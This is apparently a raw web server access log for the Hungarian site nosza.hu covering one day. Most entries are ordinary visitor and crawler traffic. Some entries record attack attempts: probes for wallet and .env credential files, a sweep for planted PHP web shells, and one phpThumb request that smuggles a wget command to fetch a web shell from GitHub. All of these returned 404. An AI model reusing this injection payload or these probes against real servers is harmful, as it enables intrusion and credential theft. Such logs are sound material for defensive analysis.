84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/css/nosza.css?l HTTP/1.1" 200 10555 "http://www.nosza.hu/new/content/gyakran-ism%C3%A9telt-k%C3%A9rd%C3%A9sek" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/all/modules/cck/theme/content-module.css?l HTTP/1.1" 200 2397 "http://www.nosza.hu/new/content/gyakran-ism%C3%A9telt-k%C3%A9rd%C3%A9sek" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css?l HTTP/1.1" 200 166 "http://www.nosza.hu/new/content/gyakran-ism%C3%A9telt-k%C3%A9rd%C3%A9sek" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/scripts/search.js HTTP/1.1" 200 466 "http://www.nosza.hu/new/content/gyakran-ism%C3%A9telt-k%C3%A9rd%C3%A9sek" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/print.css?l HTTP/1.1" 200 1247 "http://www.nosza.hu/new/content/gyakran-ism%C3%A9telt-k%C3%A9rd%C3%A9sek" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/logoMagunkrol.jpg HTTP/1.1" 200 4934 "http://www.nosza.hu/new/content/gyakran-ism%C3%A9telt-k%C3%A9rd%C3%A9sek" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/aktualisSide.jpg HTTP/1.1" 200 8821 "http://www.nosza.hu/new/content/gyakran-ism%C3%A9telt-k%C3%A9rd%C3%A9sek" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/publikaciokSide.jpg HTTP/1.1" 200 7497 "http://www.nosza.hu/new/content/gyakran-ism%C3%A9telt-k%C3%A9rd%C3%A9sek" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/rrs.jpg HTTP/1.1" 200 829 "http://www.nosza.hu/new/content/gyakran-ism%C3%A9telt-k%C3%A9rd%C3%A9sek" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/dosszieSide.jpg HTTP/1.1" 200 7764 "http://www.nosza.hu/new/content/gyakran-ism%C3%A9telt-k%C3%A9rd%C3%A9sek" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/headerBgMagunkrol.jpg HTTP/1.1" 200 22932 "http://www.nosza.hu/new/sites/default/themes/nosza/css/nosza.css?l" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/searchBg.png HTTP/1.1" 200 1443 "http://www.nosza.hu/new/sites/default/themes/nosza/css/nosza.css?l" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/dateBg.jpg HTTP/1.1" 200 654 "http://www.nosza.hu/new/sites/default/themes/nosza/css/nosza.css?l" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/egyIcon.jpg HTTP/1.1" 200 860 "http://www.nosza.hu/new/sites/default/themes/nosza/css/menu_style.css" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/negyIcon.jpg HTTP/1.1" 200 908 "http://www.nosza.hu/new/sites/default/themes/nosza/css/menu_style.css" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/magyarBgOver.png HTTP/1.1" 200 893 "http://www.nosza.hu/new/sites/default/themes/nosza/css/nosza.css?l" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/hatIcon.jpg HTTP/1.1" 200 838 "http://www.nosza.hu/new/sites/default/themes/nosza/css/menu_style.css" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/kettoIcon.jpg HTTP/1.1" 200 1039 "http://www.nosza.hu/new/sites/default/themes/nosza/css/menu_style.css" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/feelingBgMagunkrol.jpg HTTP/1.1" 200 42475 "http://www.nosza.hu/new/sites/default/themes/nosza/css/nosza.css?l" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/otIcon.jpg HTTP/1.1" 200 689 "http://www.nosza.hu/new/sites/default/themes/nosza/css/menu_style.css" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/haromIcon.jpg HTTP/1.1" 200 764 "http://www.nosza.hu/new/sites/default/themes/nosza/css/menu_style.css" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/magyarBgInactive.png HTTP/1.1" 200 686 "http://www.nosza.hu/new/sites/default/themes/nosza/css/nosza.css?l" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/englishBgInactive.png HTTP/1.1" 200 823 "http://www.nosza.hu/new/sites/default/themes/nosza/css/nosza.css?l" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:54 +0200] "GET /new/sites/default/themes/nosza/images/footerBg.jpg HTTP/1.1" 200 1097 "http://www.nosza.hu/new/sites/default/themes/nosza/css/nosza.css?l" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
84.0.169.132 - - [16/Apr/2023:10:50:55 +0200] "GET /favicon.ico HTTP/1.1" 404 1181 "http://www.nosza.hu/new/content/gyakran-ism%C3%A9telt-k%C3%A9rd%C3%A9sek" "Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
212.237.23.143 - - [16/Apr/2023:10:59:08 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
114.119.136.245 - - [16/Apr/2023:11:01:11 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
46.139.192.50 - - [16/Apr/2023:11:01:37 +0200] "GET /galateia.css HTTP/1.1" 200 1717 "http://www.nosza.hu/kutat/REVkutatas/3gazdalkodas/index.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
46.139.192.50 - - [16/Apr/2023:11:01:37 +0200] "GET /graphics/noszalogo.gif HTTP/1.1" 200 6797 "http://www.nosza.hu/kutat/REVkutatas/3gazdalkodas/index.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
46.139.192.50 - - [16/Apr/2023:11:01:37 +0200] "GET /kutat/REVkutatas/3gazdalkodas/index.html HTTP/1.1" 200 88137 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
46.139.192.50 - - [16/Apr/2023:11:01:37 +0200] "GET /graphics/galas.gif HTTP/1.1" 200 913 "http://www.nosza.hu/kutat/REVkutatas/3gazdalkodas/index.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
46.139.192.50 - - [16/Apr/2023:11:01:37 +0200] "GET /favicon.ico HTTP/1.1" 404 1181 "http://www.nosza.hu/kutat/REVkutatas/3gazdalkodas/index.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
34.211.77.101 - - [16/Apr/2023:11:12:48 +0200] "GET /kutat/REVkutatas/3gazdalkodas/index.html HTTP/1.1" 200 88137 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
185.220.100.255 - - [16/Apr/2023:11:28:26 +0200] "GET /.electrum/config HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
212.237.51.151 - - [16/Apr/2023:11:37:11 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
66.249.72.212 - - [16/Apr/2023:11:37:13 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.210 - - [16/Apr/2023:11:37:13 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.30 - - [16/Apr/2023:11:37:25 +0200] "GET /new/ HTTP/1.1" 200 10256 "http://nosza.hu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/112.0.5615.49 Safari/537.36"
66.249.72.28 - - [16/Apr/2023:11:37:27 +0200] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Googlebot-Image/1.0"
5.255.231.174 - - [16/Apr/2023:12:00:35 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
213.180.203.70 - - [16/Apr/2023:12:01:56 +0200] "GET /new/en/dossiers HTTP/1.1" 200 7967 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.72.30 - - [16/Apr/2023:12:07:12 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.49 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.28 - - [16/Apr/2023:12:07:17 +0200] "GET /new/ HTTP/1.1" 200 10256 "http://www.nosza.hu/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.49 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.24 - - [16/Apr/2023:12:07:18 +0200] "GET /new/sites/all/modules/cck/theme/content-module.css?l HTTP/1.1" 200 2397 "http://www.nosza.hu/new/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.49 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.237.23.143 - - [16/Apr/2023:12:31:18 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
66.249.72.28 - - [16/Apr/2023:12:39:39 +0200] "GET /kutat/REVkutatas/3gazdalkodas/index.html HTTP/1.1" 200 88137 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
49.12.13.109 - - [16/Apr/2023:13:30:28 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
217.65.127.122 - - [16/Apr/2023:13:41:36 +0200] "GET /nizak-peterfi.dbk.pdf HTTP/1.1" 200 156101 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
217.65.127.122 - - [16/Apr/2023:13:41:36 +0200] "GET /favicon.ico HTTP/1.1" 404 1181 "http://www.nosza.hu/nizak-peterfi.dbk.pdf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
212.237.53.115 - - [16/Apr/2023:14:21:20 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
37.76.52.197 - - [16/Apr/2023:15:05:04 +0200] "GET /aktualis/1gyikNCA/elektor/ HTTP/1.1" 200 26380 "https://www.google.hu/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Mobile/15E148 Safari/604.1"
37.76.52.197 - - [16/Apr/2023:15:05:04 +0200] "GET /galateia.css HTTP/1.1" 200 1717 "http://www.nosza.hu/aktualis/1gyikNCA/elektor/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Mobile/15E148 Safari/604.1"
37.76.52.197 - - [16/Apr/2023:15:05:04 +0200] "GET /graphics/noszalogo.gif HTTP/1.1" 200 6797 "http://www.nosza.hu/aktualis/1gyikNCA/elektor/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Mobile/15E148 Safari/604.1"
37.76.52.197 - - [16/Apr/2023:15:05:04 +0200] "GET /graphics/galas.gif HTTP/1.1" 200 913 "http://www.nosza.hu/aktualis/1gyikNCA/elektor/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Mobile/15E148 Safari/604.1"
37.76.52.197 - - [16/Apr/2023:15:05:05 +0200] "GET /favicon.ico HTTP/1.1" 404 1181 "http://www.nosza.hu/aktualis/1gyikNCA/elektor/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Mobile/15E148 Safari/604.1"
95.108.213.214 - - [16/Apr/2023:15:08:24 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.213.232 - - [16/Apr/2023:15:08:25 +0200] "GET /konferenciak/040memo/index.html HTTP/1.1" 200 33575 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
212.237.23.143 - - [16/Apr/2023:15:10:13 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
77.75.79.62 - - [16/Apr/2023:15:52:12 +0200] "GET /partnereink/index.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; SeznamBot/4.0-RC1; +http://napoveda.seznam.cz/seznambot-intro/)"
77.75.77.109 - - [16/Apr/2023:15:52:12 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SeznamBot/4.0-RC1; +http://napoveda.seznam.cz/seznambot-intro/)"
49.12.13.109 - - [16/Apr/2023:16:09:14 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
185.91.69.213 - - [16/Apr/2023:16:20:04 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:102.0) Gecko/20100101 Firefox/102.0"
185.91.69.213 - - [16/Apr/2023:16:20:07 +0200] "GET /new/ HTTP/1.1" 200 10256 "http://www.nosza.hu" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:102.0) Gecko/20100101 Firefox/102.0"
52.167.144.55 - - [16/Apr/2023:16:28:10 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
52.167.144.76 - - [16/Apr/2023:16:28:20 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
40.77.167.227 - - [16/Apr/2023:16:48:08 +0200] "GET /new/sites/default/files/NOSZA%20K%C3%83%C2%B6zhaszn%C3%83%C2%BA%20Jelent%C3%83%C2%A9s%202009_0.pdf HTTP/1.1" 404 7460 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
212.237.51.151 - - [16/Apr/2023:16:49:15 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
49.12.13.109 - - [16/Apr/2023:17:48:16 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
49.12.13.109 - - [16/Apr/2023:18:47:36 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
109.206.243.113 - - [16/Apr/2023:19:11:45 +0200] "GET /.env HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
109.206.243.113 - - [16/Apr/2023:19:11:45 +0200] "POST / HTTP/1.1" 405 1174 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
212.237.23.143 - - [16/Apr/2023:19:36:53 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
52.167.144.115 - - [16/Apr/2023:20:21:57 +0200] "GET /aktualis/1gyikNCA/palyazat/index.html HTTP/1.1" 304 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
49.12.13.109 - - [16/Apr/2023:20:36:24 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
95.108.213.82 - - [16/Apr/2023:20:52:38 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
213.180.203.206 - - [16/Apr/2023:20:52:50 +0200] "GET /new/en HTTP/1.1" 200 9248 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
212.237.53.115 - - [16/Apr/2023:21:26:52 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
36.70.67.118 - - [16/Apr/2023:21:45:19 +0200] "GET /lib/watermark/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20-O%20trustsec.php%20https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php;ls%20-la;cat%20trustsec.php;%20&phpThumbDebug=9 HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
36.70.67.118 - - [16/Apr/2023:21:45:20 +0200] "GET /lib/watermark/trustsec.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.86.215.22 - - [16/Apr/2023:21:46:42 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.6.01001)"
91.120.188.94 - - [16/Apr/2023:21:47:32 +0200] "GET /galateia.css HTTP/1.1" 200 1717 "http://www.nosza.hu/kutat/REVkutatas/4projektek/index.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
91.120.188.94 - - [16/Apr/2023:21:47:32 +0200] "GET /kutat/REVkutatas/4projektek/index.html HTTP/1.1" 200 68956 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
91.120.188.94 - - [16/Apr/2023:21:47:32 +0200] "GET /graphics/noszalogo.gif HTTP/1.1" 200 6797 "http://www.nosza.hu/kutat/REVkutatas/4projektek/index.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
91.120.188.94 - - [16/Apr/2023:21:47:33 +0200] "GET /graphics/galas.gif HTTP/1.1" 200 913 "http://www.nosza.hu/kutat/REVkutatas/4projektek/index.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
91.120.188.94 - - [16/Apr/2023:21:47:33 +0200] "GET /favicon.ico HTTP/1.1" 404 1181 "http://www.nosza.hu/kutat/REVkutatas/4projektek/index.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
89.133.20.42 - - [16/Apr/2023:22:00:12 +0200] "GET /galateia.css HTTP/1.1" 200 1717 "http://www.nosza.hu/kutat/REVkutatas/3gazdalkodas/index.html" "Mozilla/5.0 (iPad; CPU OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/259.0.522115267 Mobile/15E148 Safari/604.1"
89.133.20.42 - - [16/Apr/2023:22:00:12 +0200] "GET /graphics/noszalogo.gif HTTP/1.1" 200 6797 "http://www.nosza.hu/kutat/REVkutatas/3gazdalkodas/index.html" "Mozilla/5.0 (iPad; CPU OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/259.0.522115267 Mobile/15E148 Safari/604.1"
89.133.20.42 - - [16/Apr/2023:22:00:12 +0200] "GET /kutat/REVkutatas/3gazdalkodas/index.html HTTP/1.1" 200 88137 "https://www.google.com/url?q=http://www.nosza.hu/kutat/REVkutatas/3gazdalkodas/index.html&sa=U&ved=2ahUKEwjEk4CjmK_-AhUwgP0HHTS4DLw4HhAWegQIEBAB&usg=AOvVaw0I5djDK_Qb3qYySbC1J5Zr" "Mozilla/5.0 (iPad; CPU OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/259.0.522115267 Mobile/15E148 Safari/604.1"
89.133.20.42 - - [16/Apr/2023:22:00:12 +0200] "GET /graphics/galas.gif HTTP/1.1" 200 913 "http://www.nosza.hu/kutat/REVkutatas/3gazdalkodas/index.html" "Mozilla/5.0 (iPad; CPU OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/259.0.522115267 Mobile/15E148 Safari/604.1"
49.12.13.109 - - [16/Apr/2023:22:25:53 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
36.228.143.219 - - [16/Apr/2023:23:08:52 +0200] "GET /kutat/REVkutatas/4projektek/index.html HTTP/1.1" 200 68956 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
5.255.231.136 - - [16/Apr/2023:23:11:47 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
213.180.203.38 - - [16/Apr/2023:23:11:48 +0200] "GET /aktualis/105onk/index.html HTTP/1.1" 200 65506 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //wp-2018.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //wp-2020.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //wp-2021.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //wp-2022.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //0z.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //lock360.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //wp-22.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //wp-2019.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //fw.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //2index.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //C.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //c.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //01.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //1.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
